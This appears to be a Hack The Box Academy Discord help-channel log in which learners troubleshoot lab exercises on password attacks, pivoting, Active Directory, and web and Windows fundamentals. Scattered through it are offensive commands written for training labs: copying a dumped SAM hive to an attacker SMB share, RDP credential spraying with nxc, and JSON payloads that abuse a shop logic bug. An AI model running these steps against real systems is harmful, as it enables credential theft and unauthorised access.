@haughty furnace I know the module is focused on Burp Intruder which definitely has its uses, but ^^^^^ I would either try to move on to the next section to familiarize yourself with ZAP and try some wordlists with ZAP. Or you could try to familiarize yourself with FFUF and fuzz that way (FFUF is a tool you will use later on in the modules, so ZAP would be easier to work with since the section is right after the BURP section).
#modules
He was just having a tough time getting through the wordlists with the intruder buffering his speeds
meh the module was made with the limitation in mind tbh
@haughty furnace just keep messing around with wordlists just don't try anything too large but Marcie is right I believe I was able to get it in Intruder just can't remember the wordlist I used, sorry man
Anyone have any advice or tips on the ‘Password Attacks’ - ‘Introduction to John The Ripper’ module in the CPTS path, I have no idea where to start on using single-crack mode to crack r0lf’s password? I can’t find a user r0lf or any related files to r0lf and there’s no target to enumerate or dig into.
as i stated in #cpts; it's in the reading. you need to copy/paste the whole line given
it is in/around the same sub-heading that talks about single crack mode
Ok thanks!!
I looked at the instructions again but it’s still not making sense. I tried looking at the /usr and /bin, I can’t find r0lf
Any other tips??
it's not in /usr or /bin
the GECO (the info from /etc/passwd) is directly in the reading
Yeah but where do I find the passwd file? That’s my issue at the moment
you can create the file from the information in the reading
Ohhh right thank you that makes sense
to be more direct; it's literally the line after:
can i help you?
well this isn't #general :)
In the "Probing the Surface" section,
"What is the name of the user from the session captured in Sliver?"
Can anyone clarify exactly what part of the output is expected as the correct answer?
Which module
Intro to C2 Operations with Sliver
Done, thanks ...i think it was a space issue or something like that.
still need help with this
Hi guys
a quick search of the channel querying "base64 pfx" #modules message
HELLO! WINDOWS LATERAL MOVEMENTS - SKILLS ASSESSMENTS: Q2: when try to connect by rdp
||xfreerdp3 /d:inlanefreight /u:Arturo /p:'<HIDE>' /drive:.,linux /v:'[dead:beef:df::3]:43389'
ERROR
❯ ping6 dead:beef:df::3
PING dead:beef:df::3 (dead:beef:df::3) 56 data bytes
--- dead:beef:df::3 ping statistics ---
17 packets transmitted, 0 received, 100% packet loss, time 16377ms
use LIGOLO-NG||
THX!
if try from host PS C:\Users> ping -6 dead:beef:df::3
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss)
OK, I'm a clown, I solved it with ipv4. 🤡
its been a month since you posted this and i'm stuck here, everything looks okay, what needs to be done to be "fully compliant"?
Hi, Im doing pivoting tunneling and port forwarding assessment, and made tunnel through ssh with -D and try to scan ip on 172.16.5.0/24 which I found earlier but all ports seems filtered. I'm using nmap with -Pn and -sT, tried with socks5 and socks4 but on both I have the same result.
yeah that works, still not sure what specifically was wrong
maybe lockout duration, maybe password age who knows
that module is tier 2; please refrain from sharing stuff from it
if someone in the future gets stuck at "Weak Active Directory Password Policy" in "Active Directory Hardening", lockout duration of 15mins was the difference i think
there's no standards in the module so its just a guessing game
The solution to this module is bogus and not based on the module content or other best practices
This is why I am sharing the solution as it is just guesswork
it's still a tier 2 module, you can submit a post to #1234357888114364508 stating that the solution can't be inferred from any of the linked documentation
Ok
and if you find documentation that would be suitable, that'd be a great add to your post
that's what i meant :) if the solution can't be garnered from the existing documentation then there's a missing link
The module teaches other than the skill assessment wants to
¯_(ツ)_/¯
There is no documentation on the solution wanted
As it is just bogus
I cannot link a documentation to bogus solutions
hii guys i need help regarding pass the certificate.. i am unable to capture certificate from ntlmrelay... printerbug is giving netbios timeout error
i'm also assuming you did gpupdate /force after setting the values
This is not the problem at all
why it showing error ?
2nd question : Question: Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?
https://academy.hackthebox.com/module/67/section/926
The problem is they want a setting which is against what is recommended by Microsoft and the module
And this is confirmed by it being part of the solution document available for annual gold users, as there is this bogus config shown as solution
I would tell you which config is wanted and bogus but you already deleted it twice
hi mod! do we have forum for module: LLM Output Attacks, Section: Exfiltration Attacks?
Hi guys hope you are doing well .
Need help in the module Android Fundamentals
there's no dedicated forums for the specific modules, just ask your question here, avoiding spoilers where possible
Guys can help me on Module 307: LLM Output Attacks, Section 3590? Specifically question 2 I'm struggling. Tried to do .html markdown and host it and use a python webserver to host the file for uploading but failing 😐 to get the history chat
need someone to help me 😐
@solar arch i just sanity checked and used only values referenced in the table in the "Other Initial account Access Weaknesses" Section; i ran gpupdate /force after
¯_(ツ)_/¯
Currently not at machine, maybe it already got fixed as I reported it on release day, don’t know, didn’t recheck, but multiple people already had the same problem in this channel. Also this specific config (against module recommendations) was (or is) part of the solution document
Will recheck when at home
was this finding 2 or 5?
5
@solar arch you mind sharing the solution doc in dms when you get home (if it matches what you remember at least being out of scope)? I'll double check what i have to be sure. I'm gonna be going to bed soon but def willing to see out any interesting discrepancies
(note i just mean for this particular part, maybe the solution was updated since you initially reported and now you'll look crazy)
No worries I’ll look crazy either way :p
Hi, I'm stuck there in the windows privesc section. Has someone found a successful exploit ?
Anyone done the "Introduction to Deserialization Attacks" module Skill Assessments II for some help please, regarding the ||recreation of the serialized cookie's hash.||
you can DM me
How many cubes for Cpts course ?
Hi guys,
I’m a beginner and I’m having trouble with the editor machine I’ve obtained Oliver’s credentials and the user flag but I’m having trouble excavating privileges
I don’t have access to that channel
follow #welcome
thanks
running into double-hop troubles when trying to enumerate a target domain (cross-forest - from Windows section of AD enumeration module)
I can't run powerview commands due to the double-hop output:
Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server.
more specifically I cannot seem to run rubeus command at all. Running powershell as admin, the solution states this command will provide the hash but it doesn't. Any ideas?
The error:
[] Searching path 'LDAP://ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL/DC=FREIGHTLOGISTICS,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=)(samAccountName=mssqlsvc)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[X] Error executing the domain searcher: A local error has occurred.[X] LDAP query failed, try specifying more domain information or specific SPNs.
Does anyone mind helping me with this it's a linux fundamentals question "what is the last modified file in /var/backups"
@novel matrix Do you know the answer ?
a specific command i have to use
i did ls -la to list everything about the files in /var/backups and it gave the date. i put the last made file in there and it doesn't work
In which section specifically are you trying this command?
Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
Taken from the module text (and then solution when that didnt work)
I'm trying to create a share with SMB server but it gives me this output. Can anyone tell me why it doesn't work?
Hi everyone, I can use some help on the module Pass The Certificate on obtaining the second flag
I am in the conditional module in the intro to bash scripting CJCA path, I have tried to solve the exercise by using this and the number I get by using my exegol environment is 30237 which is not accepted, I don't know what to do, what I am doing wrong? Using pwnbox I get 1197734 and still doesn't work
```
#!/bin/bash
var="nef892na9s1p9asn2aJs71nIsm"
for counter in {1..40}
do
    var=$(echo $var | base64)
    if [[ $counter -eq 35 ]]
    then
        echo "${#var}"
        exit
    fi
done
```
just tried it on my end and it's working fine
I am using the RDP box provided, running the command as required and following the solution text, I've changed nothing and yet it doesn't work on my end and yours it does? xD
ive reset the box fresh and still it doesnt
nothing to do with the lab im using either since its the RDP box provided I am on. So idk
thanks for checking, idk what else I can possibly do.
Try changing VPN maybe that'll help
annoyingly, another box reset and new vpn seemed to do the trick. No idea what tho
thanks
That's great!
Hi !
I'm doing the Bug Bounty Hunter course, and I'm stuck on a question
Skills Assessment - Using Web Proxies
The question : Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I run Burp Intruder using the value of the encoded cookie as the request cookie, but I always get the same answer from the server and none of them seems to be the right one. Am I missing something ?
Thanks
hii anyone ready to help on pass the certificate? from password attacks..i am stuck here from last 5 hours
😂
lmao
Can someone pls answer ozeron? Thank you
Hi anyone complete this question its from Footprinting module SMB its been 5 days i tried everything but wrong flag
3.1
It's asking for banner
try with nmap
nc ip smb (port)
bro can you help me with pass the certificate?
🙏
ask here, let's see
it will fall into spoiler content
that's what they teach i guess
no i mean i have found the ports open
which service to attack there are five
i searched some through exploit but ain't worked
there are ton
okay at least which i need to search in msfconsole the version or service
so you expect company to tell you ...come on this port and hack us?
okay okay i understood bro
tell me here what to search
service : http
version : Microsoft ITS httpd 10.0
they teach quite good all these things
hello i have some questions about android fundamental module.
i think you need to revisit that section
just ask
now there is no web app running so its no go
so i need to search from leftover ports?
Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test) i found build number sdk_gphone64_x86_64-userdebug 14 UE1A.230829.050 12077443 dev-keys but i don't succeed to have a good format
these things are already taught in the modules
i think you are trying to hack somewebsite
and asking here steps
shall i give ss
it will be better
then its just so dumb of you to ask i just go to htb website and took a ss and paste it here
how would it change
just send ss
you know what even more dumb thing is? having all in that content you need to solve..and still asking here step by step
here
that's what i am saying
hello guys i have a question about this question of android fundamental module Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test) i found build number sdk_gphone64_x86_64-userdebug 14 UE1A.230829.050 12077443 dev-keys but i don't succeed to have a good format
man you guys really have something with me
lets see how far i can reach
just re - read the convo
but that were step by step questions..like he studies nothing
how to search with searchsploit
that show with demo
without reading carefully and asking
then there is issue
i forgot the name of the tool which comes with metasploit
msfvenom?
okay thats helpful
(Noob here)... Question about modules in academy: When you filter at the top in modules section, there is an option for Tier 0, Tier 1, Tier 2... do these tiers refer to the tiers in HTB Labs? or does the tiers refer to something else?
tiers are in academy
they are ranked based on difficulty , and lvls
tier0 means for beginners
tier1 is after that
if you completed tier1 then go for tier 2
like this
@cunning canopy i am getting error in pass the certificate
can you have a look if possible..
i am getting error..just have a look at the error
Hi guys anyone can help me in question for bash script?
yes ask
i cant send an screenshot for the problem
Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
that question is in the intro of bash scripting / i created the For loop and i have problem with pass this is the code exercise:
```
#!/bin/bash

# Decrypt function
function decrypt {
    MzSaas7k=$(echo $hash | sed 's/988sn1/83unasa/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/4d298d/9999/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/3i8dqos82/873h4d/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/4n9Ls/20X/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/912oijs01/i7gg/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/k32jx0aa/n391s/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/nI72n/YzF1/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/82ns71n/2d49/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/JGcms1a/zIm12/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/MS9/4SIs/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/Ymxj00Ims/Uso18/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/sSi8Lm/Mit/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/9su2n/43n92ka/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/ggf3iunds/dn3i8/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/uBz/TT0K/g')
    flag=$(echo $MzSaas7k | base64 -d | openssl enc -aes-128-cbc -a -d -salt -pass pass:$salt)
}

# Variables
var="9M"
salt=""
hash="VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K"

# Base64 Encoding Example:
#        $ echo "Some Text" | base64

# <- For-Loop here

# Check if $salt is empty
if [[ ! -z "$salt" ]]
then
    decrypt
    echo $flag
else
    exit 1
fi
```
hi guys i cannot find the flag
has anyone done parametric logic bug - PoC and Patching - Unexpected Input
i think i did it in a unintended method and wanna know what is intended method
||```
{"cardId":"6894c1dcb2f1e2270ef3cf4f","items":[{"name":"-10000","category":"cubes","price":5,"amount":1.9}]} -> money becomes 1900 but since amount is used in iteration it cube becomes -10000
{"cardId":"6894c1dcb2f1e2270ef3cf4f","items":[{"name":"19000","category":"cubes","price":5,"amount":1}]} -> money becomes 0 and cube becomes 18000
```
but i dont think this was intended because cube requirement was so less||
Which module
Hi, I'm trying to send files from a Windows machine to my machine but I always get this error. Can anyone help me?
give a folder name in remote machine
or atleast move C:\sam.save \\10.0.2.15\sam.save i guess
I already did it but it still doesn't work
Web request, http get request
i'm not sure but the exercise mention to search for flag but you searched for le?
yes
I don't post often but wanted to say that this module: Exploiting Web Vulnerabilities in Thick-Client Applications
https://academy.hackthebox.com/module/113/section/2164
Was pretty confusing. Not to take away from the lesson, which I think was really great.
Some things that would help:
- Clarify Java compiling quirks. (explain that line numbers when using JDGUI in the .java files)
- Specifically state the additional "import java.io.FileOutputStream" or at least mention code libraries.
- More clarity with naming convention in examples, particularly the folder structures. Could be quite confusing to follow given the folder names in examples.
I also created the share with smbserver
I follow writing in the module
start an smb server on your machine and give full UNC path
change the le to flag @quartz ridge
specify share name too like this move C:\sam.save \\10.0.2.15\sharename\
Bro have time to look into this but not for my matter
Noted
Ohkk np but i just asking if you ever gone through that error
Thats what i was asking
Oh , I will try this
Thanks I managed to copy the files
it is solved. thank you for help
Unrelated to a module, A realization I have come to is that beginners have no idea how bad their questions are. I remember first getting into tech a few years ago and I used to resent the responses I would get when I would come to forums like this. I honestly bet my questions were trash and the people were giving me solid advice I couldn't hear yet.
Has anyone seen where the link the PuTTY mention in the Pivoting, Tunneling, and Port Forwarding - SSH for Windows: plink.exe redirects to?
Hello all, I need some guidance regarding machines and labs, when we complete a module they recommend us some machines down below. So my question is the machines recommended does only contain content from that module only, or they may include from various modules, second what are the labs then.
Where can I report the error?
Have you completed password attacks module?
Yea, I've managed to discover what I was missing
Ohh , i think it should come by googling as well
I'm not a fan of googling these exercises, I'm sure the answer is on the material provided and/or previous materials. So long this has been true
But i am stuck at password attacks
Zug zug
Can you help me out
Oh sorry, sure where are you at?
I have completed pivoting module
Pass the certificate
Give me 1 minute
Zig zap
No
I am getting some error
Wait i will dm you the error
Kay
Sorry in the CAPE lateral movements skill assessments Q2 in the desktop of Arturo i don't find the flag. Why?
Did you move laterally?
Hello i am on module "credential hunting in Windows" https://academy.hackthebox.com/module/147/section/1318 i found the edge router username and password but i wasn't sure if I went about it the right way, i|| ran the GitBash on the desktop, and type in code, thinking it would give me the github code (which i found elsewhere)|| is there another way to go about getting the edge router credentials?
i need help with filter contents with the first question
on Linux fundamentals
What you need
I recommend breaking down your problem into small, easy to dissect questions. An example for your case would be, what kind of command can filter "contents", or what are contents? Then ask, how can I find out more information about these things to get my own answer.
but if none of that works, there is a ton of people in here with a lot of experience.
I recommend the first route, that will literally be your entire Tech career
just trust that the documentation (text file) is correct
there's a text file that contains the config; the "right way" is just whatever gets you the answer
hi,
I'm completely lost, they changed bloodhound.
Where can I find the summary table?
I can't count them by hand.
Active Directory Enumeration & Attacks
Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain. (Submit the number as the answer)
All Kerberoastable Users
@polar raven i used the smb related exploit
yes that is the search result.
All Kerberoastable Users
on the old blood hound he gave a summary table.
it also gives me this error when I upload the files and if I remember correctly both sharphound and bloodhound must be aligned with the versions, right?
spam@example.com 2025-08-07 21:39 GMT+2 (GMT+0200) 2025-08-07 21:39 GMT+2 (GMT+0200) 0 minutes Partially Complete 6 File(s) failed to ingest as JSON Content
Now I'll try from the attack box
Sometimes when you’re using a newer version of the collecting tool, it can cause trouble
you should be using the latest sharphound if you're using the latest bloodhound-ce
i just use the legacy version tbh; i don't care to use docker and stuff
Same here
Hello! May I have an hint for the HTTP Attacks - Log Injection section? I have no idea nor clue on how to bypass the WAF filter to obtain the RCE
Hey, I'm kinda stuck at
PIVOTING, TUNNELING, AND PORT FORWARDING -> RDP and SOCKS Tunneling with SocksOverRDP chapter.
I can't do a simple RDP to 172.16.5.19 from a pivot host, although solution clearly suggests to.
I tried restarting the pivot host, waiting 3-5 mins etc. and no luck.
Works only through tunnel socks, I did it at the beginning of the week.. had to be 172.16. 6 . x if i remember right
for privesc ?
yes
ok thx I will review again what I did
i believe this section is an a -> b -> c situation
a being the foothold and c being victor
you're missing the b portion, which is given in the reading
nvm i'm thinking backwards
try resetting the lab, changing vpn regions, reaching out to support
@polar raven since the module is above tier 0; i suggest not sharing it
thanks, will try that
as it would be a spoiler
yep sorry
as i said though i used the smb exploit in msfconsole
all good using the same old version, thanks
i pilfered the sharphound from one of the C:/tools/ from one of the targets
yeah but I was trying at it again by myself and it works. I don't understand exactly what SMB exploit because if you execute sherlock like in the module, i haven't any SMB exploit appearing (I'm only reading my captures which aren't maybe complete)
Anyway, I did it
Working on CBBH Skill Assessment for info gathering web edition.
Did I just use the wrong command? I didn't get any hits off of this gobuster scan:
--append-domain
you may also need to add --domain inlanefreight.htb
i usually use Bloodhound.py on Docker to avoid any problems, I wanted to follow the write up
Ooohhh thank you
writeup is using legacy afaik
Is there an update to the HTTPS/TLS Attacks Poodle & Beast module when it comes to installing TLS-Breaker? I have JDK 11 installed but I'm running into TLS Breaker Common installation issues. Any idea how to fix this?
[ERROR] Failed to execute goal com.diffplug.spotless:spotless-maven-plugin:2.27.2:apply (format) on project breaker-commons: Execution format of goal com.diffplug.spotless:spotless-maven-plugin:2.27.2:apply failed: java.lang.reflect.InvocationTargetException: 'com.sun.tools.javac.tree.JCTree com.sun.tools.javac.tree.JCTree$JCImport.getQualifiedIdentifier()' -> [Help 1]
org.apache.maven.lifecycle.LifecycleExecutionException: Failed to execute goal com.diffplug.spotless:spotless-maven-plugin:2.27.2:apply (format) on project breaker-commons: Execution format of goal com.diffplug.spotless:spotless-maven-plugin:2.27.2:apply failed: java.lang.reflect.InvocationTargetException
UPDATE: Figured it out by following instructions from this user #cwee message
if you're referring to the solution provided by the annual sub
no, I have the monthly self-renewal.
sorry I meant the module instructions not the write up
yay I got it! Thank you :D
how do i get the answer
Can happen last time i forget to add the domain to host file but now i wrote a tool for it
Is anyone able to help me out with the skills assessment for the Password Attacks module, I've made some progress but I'm stuck on the File server. I've been looking for an account that will give me RDP access to one of the other hosts but haven't made any progress there
Hey is there any Hack the Box module on python sandbox bypassing?
Sounds like a dope module
Hello all, I need some guidance regarding machines and labs, when we complete a module they recommend us some machines down below. So my question is the machines recommended does only contain content from that module only, or they may include from various modules, second what are the labs then.
You most likely wouldn't be able to use just what was covered in a module to solve a machine, but the content is applicable to the machine. Hope that makes sense.
You would want to ask in #1401229864647921734 and I wouldn't post content that could potentially be considered spoiling. If you are unable to post in that channel go to #welcome and perform the steps to get access to more channels on this server.
Oh sry 😦
need some help with the last question https://academy.hackthebox.com/module/112/section/1075
Rdp isnt always required
you know with the performance maintenance is it likely to affect some commands?
i tried ls to see everything but it just gave me nothing
This is better than if someone had answered it for you. I love that feeling.
The maintenance shouldn't affect anything if you're already connected to the machine, but the maintenance window is already over
oh i see just wanted to double check since ls didnt work but turned out be my slow wifi
If you got the first 2 questions, you should be able to get the third.
The steps you took to get those first 2 questions should mean the third is there too.
I bet it is
but I don't understand the questions and I don't wanna copy paste random stuff for the output and get lucky
I usually push the output into a file, then grep the file to find things.
sounds like a smart thing to do
but not when you don't know what to grep
It mentions a script, so I mean that can help.
can push snmpwalk it's never ending command
It can take a bit. You can also DM.
I mean alright let's say I push it
it's mentioning a script I need to find then use it and the output is the flag but how do I find this script
it's not like his name is script.py
nvm it's good
stupid question
Don't over think the keywords, think easy.
it's just the room doesn't explain what snmpwalk does
It walks through the snmp logs
¯_(ツ)_/¯
It does mention what it does, and what the tool is enumerating is covered in the beginning of the section. There are also links you can navigate to, so you can read up more on the tool and protocol.
Module: bug bounty hunting process -> writing a good report. question number 1. tried all variations of A***** *****r, upper case, lower case, abbreviated as it is in the documentation, with parenthesis around it. is there a special format the answer needs to be in?
Try one word only
Was anybody having any issues with connection to boxes at around 6pm?
I was trying to connect to a machine on the soc path. Got it to work. Was trying to search using splunk. It would hang. Then I would ping. I would get nothing for 2 minutes and then boom. Ping would work and the page would load. Kept doing that over and over again. Didn’t have enough time to diagnose before I left.
still not working.
I am going through a module, doing well, and I have a question on something I nmap'd. When I scan port 2323, I get:
nmap -p2323 10.129.132.39
---
PORT STATE SERVICE
2323/tcp open 3d-nfsd
But when I scan with -sV I get:
nmap -p2323 -sV 10.129.132.39
---
PORT STATE SERVICE VERSION
2323/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
What is causing the name of the service to change, and why would it be from a version inspection flag?
Version scans do a bit more probing, otherwise nmap is doing "best guess"
Oh I see, because its running on a non-default port it ran with the "best guess" option
and the -sV gave it more information, hence the correct name
Yerp
Hello
Ok
From Kali, I can only connect to RDP with IPV4 despite using Ligolo and adding IPV6 to the route. I can ping hosts with IPV6 from Kali, but I can't connect to RDP with either xfreerdp, xfreerdp3 or remmina. What am I doing wrong?
i try old message but don't work: xfreerdp /6 /d:inlanefreight.local /u:Arturo /p:'<REDACTED>' /w:2880 /h:1620 /dynamic-resolution/cert-ignore /drive:'backup',$PWD /port:43389 /v:[dead:beef:df::3]:43389 /timeout:99999
You at least need to submit something
even if its a blank pdf
if you submit nothing >> no 2nd attempt
but its best to just make the report as much as you can 🙂
you will get feedback on that too
Yeah thats good 🙂 you will get feedback on everything you submit
so 👍
Hello HTB team,
I’m facing a problem with the Android Fundamentals module — specifically the question:
“What is the name of the function that returns the string inside the cpp file?” (Format: FunctionName())
I have The answer and is the correct and standard native method name shown in all official examples and documentation. However, despite multiple attempts over several days, this answer is not being accepted or validated by the system.
This issue blocks progression in the module and is quite urgent. Could you please check if there is a bug with this question validation or provide guidance?
Thanks for your help!
@signal berry be mindful that even using ||spoiler text|| you'll still want to redact information like usernames and passwords; as anyone can still click on them
oops, sorry 😅
Hello, I need help in Active Directory Enumeration & Attacks - Privileged Access
in question it says find different user that CanPSRemote, I have tried everything but each time output gives only forend user
how can i found it?
Hello,
I need help with:
Module Name: Broken Authentication
Section Name: Authentication Bypass via Parameter Modification
Question you're struggling with: I fuzz the user_id parameter but I dont find the admin.
Thanks for your attention — I finally found the correct answer myself. It was a misunderstanding on my side. Sorry for the confusion!
Best regards.
im still stuck on Use what you learned in this section to find name of the user in the '/home' folder. What user did you find? for Bypassing Other Blacklisted Characters on https://academy.hackthebox.com/module/109/section/1037
well if you can achieve command injection it's as simple as finding a way to ls /home
bloodhound should find it; if you're looking for a way to discover it in powershell, you'll need to find a way to query the different potential systems i.e. academy-ea...
I have tried blood hound also, it save all computers as SID and not create connections
@spiral cove try lowercasing some of the letters; be careful not to spoil things from the module it's above tier 0 to my recollection
from what i recall what you're attempting should work
well SIDs are how windows communicates stuff
also make sure you're not missing anything by moving the window around
hey guys , can anyone help me with password attack skills assesment?
well i have put the proxy on firefox and the vpn to htb academy and the website doesnt load however, i can curl to the website from cli and burp picks up the intercept however, nothing i have tried works despite the code 200 return
is burp interceptor on? (that is a common reason it wouldn't 'load' as burp is still intercepting the request)
ok, i turned it off and it works now but im still not getting the return from the command injections
I already got DMZ01 which i used username-anarchy and got JUMP01 RDP access. Then i am stuck looking for creds for next machine.
I still have FILE01 and DC01 to do
Hello
you're at the sharing is important step; snaffler is helpful
can i DM you?
from what i'm seeing your command should work
well they are not and this is the 3rd week i have been working on thins
this*
right, screw it, im done with this shit. im not paying for this anymore
send the request to repeater and edit in there
¯_(ツ)_/¯
dm me what you've got in your screenshots
because by all means it looks like it should work
spawned a fresh target and it works out the gate for me
copy/pasted your payload
i'll spawn a fresh target first and give it a try
for short payloads like this i like to send the request to repeater since i'm not needing to modify much of anything and it's easy to view the response
I know it but it only gives SID, not any other information. I will try it again, also why did they give a 2nd machine? Maybe it is the source of my answer
dmed you
well one machine is the target, the other is an internal attack machine
iirc it's labeled Academy-EA-attack01
Thanks @fathom pendant after 3 weeks all it took was a fresh pair of eyes to see what mistake I had made. thanks for your help #BestModEver
i agree with
#BestMod
Try moving from a host you can access to another host using built-in tools/features, instead of trying to go from Kali to other hosts.
why is intro tier 0 module is medium but tier 2 module easy for same thing ?
dm me if you're still stuck
Hello, In the attacking common services -> Attacking ftp is the ftp port suppose to be closed
what are you getting ?
port closed?
Yes after running nmap -p-
It's not on the default port, scan all ports
I’m having this same problem. Did you figure this out?
About the module "Introduction To Digital Forensics", first question in "Practical Digital Forensics Scenario" (scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744).
I solved it, but I question my methodology.
What I did: dloaded the process mem dump to my vm and basically brute force searched it via strings. I checked all the commands that could be there (invoke,get, enum..) and finally got the result.
Is there a smarter way?
You're almost there. However, you need to look at the format that mentioned in the example
build_number-test
Look at the example Hello from C++ and try to figure out what method returns a string to the Java layer?
solved ? if not you can dm me
Hi i'm on the "Windows Fundamentals" trying to use the xfreerdp command and its just saying error
tried in my vm and on pwnbox
show error please
[06:37:14:493] [11637:11638] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[06:37:14:493] [11637:11638] [ERROR][com.freerdp.core] - failed to connect to 10.129.177.31
$ xfreerdp /v:<targetIp> /u:htb-student /p:Password
i used this command obviously replacing the placeholder names
i just tried to changed the vpn and it terminated my instance and i cant reopen it
will this still work in my kali vm
surely right?
you mean the target ip?
i just used xfreerdp3 on my kali vm
instead of xfreerdp, same thing right?
just got a bunch of text saying
no RDP scancode found
hostname key changed
and loads of @@@@@@@@@@@@@@
and at the end asked do you trust the above certificate
is that it?
so put y
Yea
yes
¯_(ツ)_/¯
weirdddd
at least im on now
and now im getting errors running the command to get the build number
Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber
why doesn't this work
Are you running that in powershell or cmd
Hello people, I am stuck with the Password Attacks Skills Assessment module. I have exhausted available resources or at least as I see that. I have SMB creds that I was trying to use to spider through one of the systems shares, where I could find some other users and a bunch of useless files. My goal right now is to get access to a specific share which is interesting to us (the share that's mentioned in one of module's sections) and spider for creds there. Even though I tried bruteforcing with password list to get into smb dirs of other users, it was to no avail. I have spidered all existing files on shares for the user whose password I know and didn't find anything that could advance me.
i fixed it now sorry
you're right i may have been running it into cmd
just tried powershell and it worked
its just in the desc it said cmdlet
so i assumed cmd
Ah no cmdlets are a powershell concept!
As a further note: blue background in the module example == powershell, black == cmd
got it
@terse bloom
If you're still on the foothold host and first set of creds: history is a great teacher
Ah, thanks
on the question to find flag file why do you go into the Academy directory. is it because PerfLogs, Program Files, etc. are classed as standard directories?
just wanna confirm so i'm not going down the wrong path
Wait, by the first set of creds, do you mean the creds which are given on the HTB platform in the task itself?
Yes
Yes
thankssss
Well... I have already found a different set and everything I typed above was performed with the newly found set
Then snaffler is your friend
But you would need to get a shell for that? Whatever the creds I found I tested against all three hosts with remote control protocols... Which is basically why I'm stuck. I know that this guy that I found is a valid user due to kerbrute, however apparently he's not a part of a remote management group
nxc allows you to use a list for your hosts so you can check various protocols on various hosts
nxc rdp hosts.txt -u username -p password
Yep, that's what I did
Im also assuming you set up a pivot
yes, ligolo
The user should start with h
yep, that's the one i used for nxc
Im not available to sanity check but he should be able to connect to a machine
Well, funny thing is that the nxc is probably "false positiving", it's saying [+], but in reality, I use the remote commands to actually connect and nothing
Idk if that's the thing for this task, but I definitely had that happen in CTF machines
Should be able to connect to jump01 with rdp
Also make sure you're putting in the username correctly
I have tried that before, it didn't work, now I retried with -d flag for nxc and it works...
Thanks, I thought I was gonna go insane.
I won't respond for a few hours. So if it's related to moderation, its best to ask another mod
Ok ok ty
When it comes to moderation, feel free to contact me.
I am doing the Cracking Passwords with Hashcat module, but I am getting stuck cracking the common password page. I am cracking 7106812752615cdfe427e01b98cd4083 which (through hashid) gives me:
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
ofc I am not going to try all of these so I am trying the low-hanging ones like MD5 and NTLM but no luck so far. I am trying different default rulesets but esp if I have to hybrid this out I'll be running these for like hours and I think I am missing something
Any ideas/hints?
Also am I using hashid wrong? because this amount of output really doesn't help me with anything much.
Currently I just do:
hashid '7106812752615cdfe427e01b98cd4083'
hashid -m '<HASH HERE>'
Yeah I mean that gives me the modes, still useful, I was looking them up on the hashcat example hash list, ty.
It leaves me with the main problem though 😢
which wordlist you using? I usually do rockyou with an -a 0
In modules usually use rockyou or the wordlist provided if they have one
yeah rockyou and -a 0, this one specifically says to apply some of the rulesets hashcat has by default, but I have too little info I think, given that there are a lot of possible hash formats still and a lot of different rulesets (some of which lead to hours of running)
Well let's narrow that down, where was the hash retrieved from usually helps narrow it down
It doesn't say, the exercise is this:
Crack the following hash: 7106812752615cdfe427e01b98cd4083
And the hint says the following:
Use hashid to identify the hash, and then use one of the Hashcat built-in rule sets or hybrid mode to help you crack it.
yeah I haven't really done that module so you're gonna have to wait for someone who has...
alright makes sense, thanks for the effort! I think I'll move on to sth else in the meantime
in NTFS vs. Share Permissions the smbclient command won't work in my vm terminal
does this exercise need to be done on pwnbox?
Which module and please share errors always using screenshots
windows fundamentals
do_connect: Connection to 10.129.81.189 failed (Error NT_STATUS_IO_TIMEOUT)
will do, but it's just a small error
just says it can't connect
do_connect: Connection to SERVER_IP failed (Error NT_STATUS_NOT_FOUND)
what command are you executing specifically
smbclient -L SERVER_IP -U htb-student
i switched server_ip for the ip of the target in case that was an issue
and still the same error
The syntax is not correct, use forward or backslashes with the IP
i tried both, where would you put them
show me how you are putting them
smbclient -L \SERVER_IP -U htb-student
thats double
but it doesnt show both
i tried / as well
same error everytime
just seems the smbclient doesnt go with my kali vm
